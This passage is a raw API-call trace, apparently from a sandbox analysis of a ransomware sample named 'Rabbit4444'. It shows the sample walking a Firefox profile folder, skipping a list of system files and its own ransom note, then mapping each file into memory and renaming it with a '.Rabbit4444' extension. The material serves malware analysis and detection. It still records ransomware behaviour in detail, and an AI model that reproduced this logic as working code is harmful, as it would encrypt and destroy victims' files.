param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\extensions.json.Rabbit4444") returned 100 [0050.781] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\extensions.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\extensions.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\extensions.json.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\extensions.json.rabbit4444"), dwFlags=0x1) returned 1 [0050.781] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdd54ecc, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfdd54ecc, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x145311ab, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x500000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="favicons.sqlite", cAlternateFileName="FAVICO~1.SQL")) returned 1 [0050.781] lstrcmpiW (lpString1="favicons.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.781] lstrcmpiW (lpString1="favicons.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.781] lstrcmpiW (lpString1="favicons.sqlite", lpString2="Rabbit4444.exe") returned -1 [0050.781] lstrcmpiW (lpString1="favicons.sqlite", lpString2=".") returned 1 [0050.781] lstrcmpiW (lpString1="favicons.sqlite", lpString2="..") returned 1 [0050.782] lstrcmpiW (lpString1="favicons.sqlite", lpString2="windows") returned -1 [0050.782] lstrcmpiW (lpString1="favicons.sqlite", lpString2="bootmgr") returned 1 [0050.782] lstrcmpiW (lpString1="favicons.sqlite", lpString2="pagefile.sys") returned -1 [0050.782] lstrcmpiW (lpString1="favicons.sqlite", lpString2="boot") returned 1 [0050.782] lstrcmpiW (lpString1="favicons.sqlite", lpString2="ids.txt") returned -1 [0050.782] lstrcmpiW (lpString1="favicons.sqlite", lpString2="NTUSER.DAT") returned -1 [0050.782] lstrcpyW (in: lpString1=0x130ebcc, lpString2="favicons.sqlite" | out: lpString1="favicons.sqlite") returned="favicons.sqlite" [0050.782] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite", dwFileAttributes=0x0) returned 1 [0050.782] lstrlenW (lpString="favicons.sqlite") returned 15 [0050.782] lstrlenW (lpString="Rabbit4444") returned 10 [0050.782] lstrcmpiW (lpString1="ons.sqlite", lpString2="Rabbit4444") returned -1 [0050.783] lstrlenW (lpString=".dll") returned 4 [0050.783] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0050.783] lstrlenW (lpString=".lnk") returned 4 [0050.783] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0050.783] lstrlenW (lpString=".ini") returned 4 [0050.783] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0050.783] lstrlenW (lpString=".sys") returned 4 [0050.783] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0050.783] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.783] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.783] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14209368611) returned 1 [0050.783] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5242880) returned 1 [0050.783] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0050.783] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0050.783] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x500300, lpName=0x0) returned 0x298 [0050.784] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x100300) returned 0x1090000 [0050.823] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x2c20000 [0050.878] UnmapViewOfFile (lpBaseAddress=0x2c20000) returned 1 [0050.897] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x200000) returned 0x2c20000 [0050.946] UnmapViewOfFile (lpBaseAddress=0x2c20000) returned 1 [0051.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0051.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0051.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0051.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0051.081] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0051.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0051.081] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14239199987) returned 1 [0051.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0051.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0051.081] UnmapViewOfFile (lpBaseAddress=0x1090000) returned 1 [0051.091] CloseHandle (hObject=0x298) returned 1 [0051.091] CloseHandle (hObject=0x278) returned 1 [0051.091] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite.Rabbit4444") returned 100 [0051.091] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite.rabbit4444"), dwFlags=0x1) returned 1 [0051.091] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba329010, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xba329010, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0x72e7b76, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="favicons.sqlite-shm", cAlternateFileName="FAVICO~3.SQL")) returned 1 [0051.092] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.092] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.092] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="Rabbit4444.exe") returned -1 [0051.092] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2=".") returned 1 [0051.092] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="..") returned 1 [0051.092] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="windows") returned -1 [0051.092] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="bootmgr") returned 1 [0051.092] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="pagefile.sys") returned -1 [0051.092] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="boot") returned 1 [0051.092] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="ids.txt") returned -1 [0051.092] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="NTUSER.DAT") returned -1 [0051.092] lstrcpyW (in: lpString1=0x130ebcc, lpString2="favicons.sqlite-shm" | out: lpString1="favicons.sqlite-shm") returned="favicons.sqlite-shm" [0051.092] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-shm", dwFileAttributes=0x0) returned 1 [0051.092] lstrlenW (lpString="favicons.sqlite-shm") returned 19 [0051.092] lstrlenW (lpString="Rabbit4444") returned 10 [0051.092] lstrcmpiW (lpString1="sqlite-shm", lpString2="Rabbit4444") returned 1 [0051.092] lstrlenW (lpString=".dll") returned 4 [0051.092] lstrcmpiW (lpString1="-shm", lpString2=".dll") returned 1 [0051.092] lstrlenW (lpString=".lnk") returned 4 [0051.092] lstrcmpiW (lpString1="-shm", lpString2=".lnk") returned 1 [0051.092] lstrlenW (lpString=".ini") returned 4 [0051.092] lstrcmpiW (lpString1="-shm", lpString2=".ini") returned 1 [0051.092] lstrlenW (lpString=".sys") returned 4 [0051.092] lstrcmpiW (lpString1="-shm", lpString2=".sys") returned 1 [0051.092] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-shm" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite-shm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.093] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.093] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14240343387) returned 1 [0051.093] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=32768) returned 1 [0051.093] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0051.093] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0051.093] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8300, lpName=0x0) returned 0x298 [0051.095] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8300) returned 0x70000 [0051.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0051.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0051.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0051.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0051.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0051.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0051.098] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14240870577) returned 1 [0051.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0051.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0051.098] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.098] CloseHandle (hObject=0x298) returned 1 [0051.098] CloseHandle (hObject=0x278) returned 1 [0051.099] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-shm.Rabbit4444") returned 104 [0051.099] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-shm" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite-shm"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-shm.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite-shm.rabbit4444"), dwFlags=0x1) returned 1 [0051.099] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba329010, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xba329010, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0x45aebce0, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x901d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="favicons.sqlite-wal", cAlternateFileName="FAVICO~2.SQL")) returned 1 [0051.099] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.099] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.099] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="Rabbit4444.exe") returned -1 [0051.099] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2=".") returned 1 [0051.099] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="..") returned 1 [0051.099] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="windows") returned -1 [0051.099] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="bootmgr") returned 1 [0051.099] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="pagefile.sys") returned -1 [0051.099] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="boot") returned 1 [0051.099] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="ids.txt") returned -1 [0051.099] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="NTUSER.DAT") returned -1 [0051.099] lstrcpyW (in: lpString1=0x130ebcc, lpString2="favicons.sqlite-wal" | out: lpString1="favicons.sqlite-wal") returned="favicons.sqlite-wal" [0051.100] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-wal", dwFileAttributes=0x0) returned 1 [0051.100] lstrlenW (lpString="favicons.sqlite-wal") returned 19 [0051.100] lstrlenW (lpString="Rabbit4444") returned 10 [0051.100] lstrcmpiW (lpString1="sqlite-wal", lpString2="Rabbit4444") returned 1 [0051.100] lstrlenW (lpString=".dll") returned 4 [0051.100] lstrcmpiW (lpString1="-wal", lpString2=".dll") returned 1 [0051.100] lstrlenW (lpString=".lnk") returned 4 [0051.100] lstrcmpiW (lpString1="-wal", lpString2=".lnk") returned 1 [0051.100] lstrlenW (lpString=".ini") returned 4 [0051.100] lstrcmpiW (lpString1="-wal", lpString2=".ini") returned 1 [0051.100] lstrlenW (lpString=".sys") returned 4 [0051.100] lstrcmpiW (lpString1="-wal", lpString2=".sys") returned 1 [0051.100] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-wal" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite-wal"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.100] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.100] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14241114167) returned 1 [0051.100] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=590288) returned 1 [0051.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0051.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0051.101] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x904d0, lpName=0x0) returned 0x298 [0051.102] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x904d0) returned 0x1090000 [0051.120] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0051.120] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0051.120] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0051.120] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0051.120] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.120] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0051.121] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.121] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0051.121] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14243133990) returned 1 [0051.121] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0051.121] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0051.121] UnmapViewOfFile (lpBaseAddress=0x1090000) returned 1 [0051.126] CloseHandle (hObject=0x298) returned 1 [0051.126] CloseHandle (hObject=0x278) returned 1 [0051.126] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-wal.Rabbit4444") returned 104 [0051.127] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-wal" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite-wal"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-wal.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite-wal.rabbit4444"), dwFlags=0x1) returned 1 [0051.127] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdbd76e4, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfdbd76e4, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x4079e226, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gmp", cAlternateFileName="")) returned 1 [0051.127] lstrcmpiW (lpString1="gmp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.127] lstrcmpiW (lpString1="gmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.127] lstrcmpiW (lpString1="gmp", lpString2="Rabbit4444.exe") returned -1 [0051.127] lstrcmpiW (lpString1="gmp", lpString2=".") returned 1 [0051.127] lstrcmpiW (lpString1="gmp", lpString2="..") returned 1 [0051.127] lstrcmpiW (lpString1="gmp", lpString2="windows") returned -1 [0051.127] lstrcmpiW (lpString1="gmp", lpString2="bootmgr") returned 1 [0051.127] lstrcmpiW (lpString1="gmp", lpString2="pagefile.sys") returned -1 [0051.127] lstrcmpiW (lpString1="gmp", lpString2="boot") returned 1 [0051.127] lstrcmpiW (lpString1="gmp", lpString2="ids.txt") returned -1 [0051.127] lstrcmpiW (lpString1="gmp", lpString2="NTUSER.DAT") returned -1 [0051.127] lstrcpyW (in: lpString1=0x130ebcc, lpString2="gmp" | out: lpString1="gmp") returned="gmp" [0051.127] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6428 [0051.128] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9c) returned 0xf11e8 [0051.128] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6430 | out: ListHead=0xf68b0, ListEntry=0xf6430) returned 0xf6410 [0051.128] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40c4b15, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x40c4b15, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x40c5e7c, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gmp-gmpopenh264", cAlternateFileName="GMP-GM~1")) returned 1 [0051.128] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.128] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.128] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="Rabbit4444.exe") returned -1 [0051.128] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2=".") returned 1 [0051.128] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="..") returned 1 [0051.128] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="windows") returned -1 [0051.128] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="bootmgr") returned 1 [0051.128] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="pagefile.sys") returned -1 [0051.128] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="boot") returned 1 [0051.128] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="ids.txt") returned -1 [0051.128] lstrcmpiW (lpString1="gmp-gmpopenh264", lpString2="NTUSER.DAT") returned -1 [0051.128] lstrcpyW (in: lpString1=0x130ebcc, lpString2="gmp-gmpopenh264" | out: lpString1="gmp-gmpopenh264") returned="gmp-gmpopenh264" [0051.128] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6488 [0051.128] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0xef950 [0051.128] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6490 | out: ListHead=0xf68b0, ListEntry=0xf6490) returned 0xf6430 [0051.128] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5af7cc2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x5af7cc2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x5af7cc2, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gmp-widevinecdm", cAlternateFileName="GMP-WI~1")) returned 1 [0051.128] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.128] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.128] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="Rabbit4444.exe") returned -1 [0051.128] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2=".") returned 1 [0051.128] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="..") returned 1 [0051.128] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="windows") returned -1 [0051.128] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="bootmgr") returned 1 [0051.128] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="pagefile.sys") returned -1 [0051.128] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="boot") returned 1 [0051.128] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="ids.txt") returned -1 [0051.128] lstrcmpiW (lpString1="gmp-widevinecdm", lpString2="NTUSER.DAT") returned -1 [0051.128] lstrcpyW (in: lpString1=0x130ebcc, lpString2="gmp-widevinecdm" | out: lpString1="gmp-widevinecdm") returned="gmp-widevinecdm" [0051.128] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6448 [0051.128] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0xefd18 [0051.128] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6450 | out: ListHead=0xf68b0, ListEntry=0xf6450) returned 0xf6490 [0051.128] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2edfb3e, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x2edfb3e, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x2ee0ebb, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x2ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="handlers.json", cAlternateFileName="HANDLE~1.JSO")) returned 1 [0051.128] lstrcmpiW (lpString1="handlers.json", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.129] lstrcmpiW (lpString1="handlers.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.129] lstrcmpiW (lpString1="handlers.json", lpString2="Rabbit4444.exe") returned -1 [0051.129] lstrcmpiW (lpString1="handlers.json", lpString2=".") returned 1 [0051.129] lstrcmpiW (lpString1="handlers.json", lpString2="..") returned 1 [0051.129] lstrcmpiW (lpString1="handlers.json", lpString2="windows") returned -1 [0051.129] lstrcmpiW (lpString1="handlers.json", lpString2="bootmgr") returned 1 [0051.129] lstrcmpiW (lpString1="handlers.json", lpString2="pagefile.sys") returned -1 [0051.129] lstrcmpiW (lpString1="handlers.json", lpString2="boot") returned 1 [0051.129] lstrcmpiW (lpString1="handlers.json", lpString2="ids.txt") returned -1 [0051.129] 